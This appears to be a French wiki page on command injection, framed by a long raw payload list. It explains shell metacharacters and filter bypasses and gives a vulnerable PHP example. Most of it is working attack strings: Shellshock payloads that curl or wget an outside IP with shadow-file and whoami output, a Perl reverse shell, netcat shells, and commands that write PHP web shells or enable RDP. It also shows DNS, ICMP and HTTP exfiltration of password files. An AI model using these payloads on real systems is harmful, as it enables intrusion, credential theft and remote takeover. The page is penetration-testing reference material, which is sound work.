& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
system('cat C:\boot.ini');
system('cat config.php');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
<nowiki>{{ get_user_file("C:\boot.ini") }}</nowiki>
<nowiki>{{ get_user_file("/etc/hosts") }}</nowiki>
<nowiki>{{4+4}}</nowiki>
<nowiki>{{4+8}}</nowiki>
<nowiki>{{person.secret}}</nowiki>
<nowiki>{{person.name}}</nowiki>
{1} + {1}
<nowiki>{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}</nowiki>
{{[] .__ Class __.__ base __.__ subclasses __ ()}}

== Références ==
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
*https://github.com/payloadbox/command-injection-payload-list
*https://book.hacktricks.xyz/pentesting-web/command-injection

Web:Injection de Commandes

2023-12-02T18:57:45Z

OldNeib : /* Windows */

Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
== Les Métacharacteres ==
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule.
& | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde.
&& | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante.
| | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande.
|| | Le || n'exécute la commande suivante que si la commande précédente échoue.
`` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'

Exemple simple de script PHP utilisant ping.
<?php
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
echo $response;
}
?>

Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
*127.0.0.1;ls -la
*;ls -la
*;ls%20-la
*;ls%09-la
*(...)

== Afficher le contenu d'un fichier PHP ==
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.

== Contournement de filtres ==
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.

La commande suivant le %0a sera alors exécutée.

=== Exemple de filtre maison ===
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
*127.0;.0.1
*12&7.0.0.1
*(...)

Il est donc primordial de jouer avec les espaces!
*127.0.0.1|cat password.txt
*127.0.0.1 |cat password.txt
*127.0.0.1| cat password.txt
*(...)

Une commande possible serait donc:

127.0.0.1%0als -la

On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.

=== Autre type de filtres ===
==== Double Encoding ====
Dans le cas oú l'on aurait quelque chose comme ça:

str_replace("%26", "")

On donc peut tenter un double encoding %%2626 deviendra alors %26.

==== Sans Espaces ====
Dans le cas oú les espaces serait supprimmés:

===== Le Bash Internal Field Separator: $IFS =====

;cat${IFS}/etc/passwd

===== SI IFS est blacklisté =====

;{cat,/etc/passwd}

===== Utilisation de TAB =====

;cat%09/etc/passwd

===== Line-Feed in the middle =====

;cat%0a/etc/passwd

===== Utilisation du '+' =====

;cat+/etc/passwd

===== Env Variable =====
;$var='x20';cat${var}/etc/passwd

===== Sans $ ni {} =====
;IFS=,;`cat<<</etc,/passwd`

==== Certains mots blacklistés ====
Si "cat" ou "passwd" ou "nimp" est blacklisté:

===== The Wildcard caracters =====

;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd

===== Unitialized variable $u qui a une valeur nulle =====

;cat$u /etc$u/passwd

===== Null Variable =====

;cat /et``c/pas``swd
;cat /e$()tc/pa$()sswd
;cat /etc$(dlam)/pa$(erde)sswd

===== Troncation par quote, double quotes, ou backslash =====

;/bin/c"at" /e"tc"/pa"ss"wd
;/b'i'n/c'a't /e't'c/p'a's's'w'd'
;c\at /e\tc/pa\s\swd/

===== $@ =====
;c$@at /etc/passwd

==== Sans Slash ====
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:

;cat ${HOME:0;1}etc${HOME:0;1}passwd

==== ${SHELLOPTS} ====
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

${SHELLOPTS:3:1} représente un c.
${SHELLOPTS:2:1} représente un a.
(À creuser...)
;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd

==== Reverse and Encode ====
;`echo "dwssap/cte/ tac | rev`
;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

==== Hexadecimal encode ====

;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)

== Cheat Sheet ==
=== Top 25 des paramètres pouvant conduire à une injection ===
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

=== Fonctions PHP vulnérables ===
system()
exec()
shell_exec()
open()
pcntl_exec()
ioctl_exec()
eio_syncfs()
proc_open()
popen()

Command Execution Function Filtered possible Bypass with encoding
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Reverse quotation marks are identical shell_exec()

=== DATA Exfiltration ===
Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([https://requestcatcher.com/])

==== cURL ====
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php
$ curl -d "@file" -X POST http://domain.com

==== cURL avec FTP ====
$ curl -T file ftp://ip -user nick:pass

==== Netcat ====
$ nc -l -p {port} < {file to extract}

==== ICMP ====
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.

Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done

Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.

==== DNS ====
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done
for i in $(cat password.txt); do host $i.hkj.com; done

Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.

==== Time based data exfiltration ====
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

==== Reverse Shell ====
Avec Netcat:
nc -L -p port -e cmd.exe (Windows)
nc -l -p port -e /bin/bash (*nix)

===== Se connecter =====
====== Netcat ======
$ nc {ip} {port}
$ nc {ip} {port} > output

(Windows)
type {file to extract} | nc -L -p {port}

====== wget ======
wget --post-data exfile=`cat /path/to/file` http://domain.com
wget --post-file file http://domain.com

====== Telnet ======
telnet ip port < file

=== Command Injection/Execution Cheat Sheet ===
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands

#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
===== Unix =====




/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
<nowiki>{{ get_user_file("/etc/passwd") }}</nowiki>



system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>

===== Windows =====
<nowiki>
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d

%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX